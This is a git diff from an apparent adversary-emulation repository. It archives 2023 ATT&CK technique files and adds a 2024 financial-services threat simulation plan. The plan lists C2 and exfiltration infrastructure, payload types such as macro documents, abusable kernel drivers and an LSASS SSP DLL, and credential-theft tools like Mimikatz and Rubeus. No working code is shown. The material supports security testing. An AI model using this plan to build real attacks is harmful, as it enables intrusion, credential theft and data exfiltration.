diff --git a/h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml b/archived/2023/h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
similarity index 100%
rename from h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
rename to archived/2023/h-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml b/archived/2023/h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
diff --git a/h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml b/archived/2023/h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1547.001_runonce_v2.yml
diff --git a/h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1547.001_startupfolder_v1.yml
diff --git a/h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml b/archived/2023/h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml
similarity index 100%
rename from h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml
rename to archived/2023/h-index-2023/techniques/Persistence/T1564.002_hide_user_logon_v1.yml
diff --git a/rh-index-2023/NOTEBOOK.md b/archived/2023/rh-index-2023/NOTEBOOK.md
similarity index 100%
rename from rh-index-2023/NOTEBOOK.md
rename to archived/2023/rh-index-2023/NOTEBOOK.md
diff --git a/rh-index-2023/REQUIREMENTS.md b/archived/2023/rh-index-2023/REQUIREMENTS.md
similarity index 100%
rename from rh-index-2023/REQUIREMENTS.md
rename to archived/2023/rh-index-2023/REQUIREMENTS.md
diff --git a/rh-index-2023/navigator.json b/archived/2023/rh-index-2023/navigator.json
similarity index 100%
rename from rh-index-2023/navigator.json
rename to archived/2023/rh-index-2023/navigator.json
diff --git a/rh-index-2023/rh-index-2023-v1.2-summary.csv b/archived/2023/rh-index-2023/rh-index-2023-v1.2-summary.csv
similarity index 100%
rename from rh-index-2023/rh-index-2023-v1.2-summary.csv
rename to archived/2023/rh-index-2023/rh-index-2023-v1.2-summary.csv
diff --git a/rh-index-2023/rh-index-2023-v1.2.yml b/archived/2023/rh-index-2023/rh-index-2023-v1.2.yml
similarity index 100%
rename from rh-index-2023/rh-index-2023-v1.2.yml
rename to archived/2023/rh-index-2023/rh-index-2023-v1.2.yml
diff --git a/rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml b/archived/2023/rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
rename to archived/2023/rh-index-2023/techniques/Collection/T1560.001_7zip_v1.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpc2_v3.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1071.001_httpsc2_v3.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1105_tooldownload_v2.yml
diff --git a/rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml b/archived/2023/rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
rename to archived/2023/rh-index-2023/techniques/CommandandControl/T1219_remote_assist_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_procdump_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.001_processhacker_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.002_hashdump_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1003.006_dcsync_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml
diff --git a/rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml b/archived/2023/rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml
rename to archived/2023/rh-index-2023/techniques/CredentialAccess/T1558.003_kerberoast_v3.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.005_mshta_v2.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml
diff --git a/rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml b/archived/2023/rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
rename to archived/2023/rh-index-2023/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml
diff --git a/rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1018_nltest_dclist_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1046_networkscan_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1049_sessiongopher_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1082_systeminfo_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.001_net_localgroup_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.002_ad_explorer_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.002_net_domainadmins_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1087.002_setspn_collection_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1135_netview_shares_v1.yml
diff --git a/rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml b/archived/2023/rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
rename to archived/2023/rh-index-2023/techniques/Discovery/T1482_nltest_all_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1059.005_vbs_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1106_exe_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1106_exe_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1106_exe_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1106_exe_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_hta_v1.yml
diff --git a/rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml b/archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml
rename to archived/2023/rh-index-2023/techniques/Execution/T1204.002_macro_v1.yml
diff --git a/rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml b/archived/2023/rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
rename to archived/2023/rh-index-2023/techniques/Exfiltration/T1567.002_mega_rclone_v1.yml
diff --git a/rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml b/archived/2023/rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
rename to archived/2023/rh-index-2023/techniques/Impact/T1021.002_remote_ransomware_v2.yml
diff --git a/rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml b/archived/2023/rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml
rename to archived/2023/rh-index-2023/techniques/Impact/T1486_ransomware_v3.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1027.006_html_smuggle_email_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1078_simultaneouslogin_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1078_suspicious_login_v3.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_iso_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.001_zipped_macro_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_iso_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1566.002_zipped_vbs_v1.yml
diff --git a/rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml b/archived/2023/rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
rename to archived/2023/rh-index-2023/techniques/InitialAccess/T1621_mfa_spam_v1.yml
diff --git a/rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml b/archived/2023/rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
similarity index 100%
rename from rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
rename to archived/2023/rh-index-2023/techniques/LateralMovement/T1021.001_rdp_v2.yml
diff --git a/rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml b/archived/2023/rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
rename to archived/2023/rh-index-2023/techniques/LateralMovement/T1021.003_wmipcc_v1.yml
diff --git a/rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1053.005_schtask_v7.yml
diff --git a/rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1098.005_aadjoin_v1.yml
diff --git a/rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1136.001_newlocaladmin_v1.yml
diff --git a/rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml b/archived/2023/rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
similarity index 100%
rename from rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
rename to archived/2023/rh-index-2023/techniques/Persistence/T1543.003_newservice_reg_v1.yml
diff --git a/fs-index-2024/CHANGELOG.md b/fs-index-2024/CHANGELOG.md
new file mode 100644
index 0000000..b5315fa
--- /dev/null
+++ b/fs-index-2024/CHANGELOG.md
@@ -0,0 +1,4 @@
+# v1.0 (January 2024)
+
+- Initial release
+
diff --git a/fs-index-2024/REQUIREMENTS.md b/fs-index-2024/REQUIREMENTS.md
new file mode 100644
index 0000000..d41c3ca
--- /dev/null
+++ b/fs-index-2024/REQUIREMENTS.md
@@ -0,0 +1,39 @@
+# Infrastructure
+
+- Mail server/relay to send emails
+- Proxy/VPN 
+- Proxy/VPN in non-standard geolocation
+- HTTP/S file hosting server 
+- Command-and-control server(s) with HTTPS and HTTP channels
+- Accounts for : Cloud storage provider (exfil), remote assistance service (if applicable)
+- C3, or similar server for C2 over a webservice (and appropriate credentials for that service)
+- Domain(s) and certificate(s) for infrastructure
+
+# Payloads
+
+|#|Test Case|Payload|Notes|
+|---|---|---|---|
+|1|Attachment - Zipped macro|Macro-enabled Office doc in ZIP||
+|2|Attachment - ISO|ISO||
+|3|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes|
+|4|DLL execution using Rundll32|DLL||
+|5|Sideload a DLL into a legitimate application|DLL|can be shared with #4 as long as exported functions are as expected|
+|6|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL|
+|7|<Exfiltration>|Sensitive data|Use dlptest.com for sample data|
+|8|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template||
+
+# Tools/Scripts
+
+- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect
+- SharpHound : https://github.com/BloodHoundAD/SharpHound
+- Net Scan : https://www.softperfect.com/products/networkscanner/
+- C3 : https://github.com/WithSecureLabs/C3
+- Mimikatz : https://github.com/gentilkiwi/mimikatz
+- Nanodump : https://github.com/fortra/nanodump
+- Rubeus : https://github.com/GhostPack/Rubeus
+- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI
+- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+- AADInternals : https://github.com/Gerenios/AADInternals
+
+
diff --git a/fs-index-2024/fs-index-2024-v1.0-layer.json b/fs-index-2024/fs-index-2024-v1.0-layer.json
new file mode 100644
index 0000000..e9c8d73
--- /dev/null
+++ b/fs-index-2024/fs-index-2024-v1.0-layer.json
@@ -0,0 +1,3152 @@
+{
+    "description": "Financial Services Threat Simulation Index 2024 v1.0",
+    "domain": "enterprise-attack",
+    "layout": {
+        "layout": "flat"
+    },
+    "name": "Financial Services Threat Simulation Index 2024 v1.0",
+    "selectSubtechniquesWithParent": false,
+    "selectTechniquesAcrossTactics": false,
+    "techniques": [
+        {
+            "enabled": false,
+            "techniqueID": "T1001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.005"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1013"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1017"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1018"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1019"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020.001"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1022"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1023"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1024"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1025"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1026"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1028"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1029"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1030"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1031"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1032"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1033"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1034"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1035"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.007"
+        },
+        {
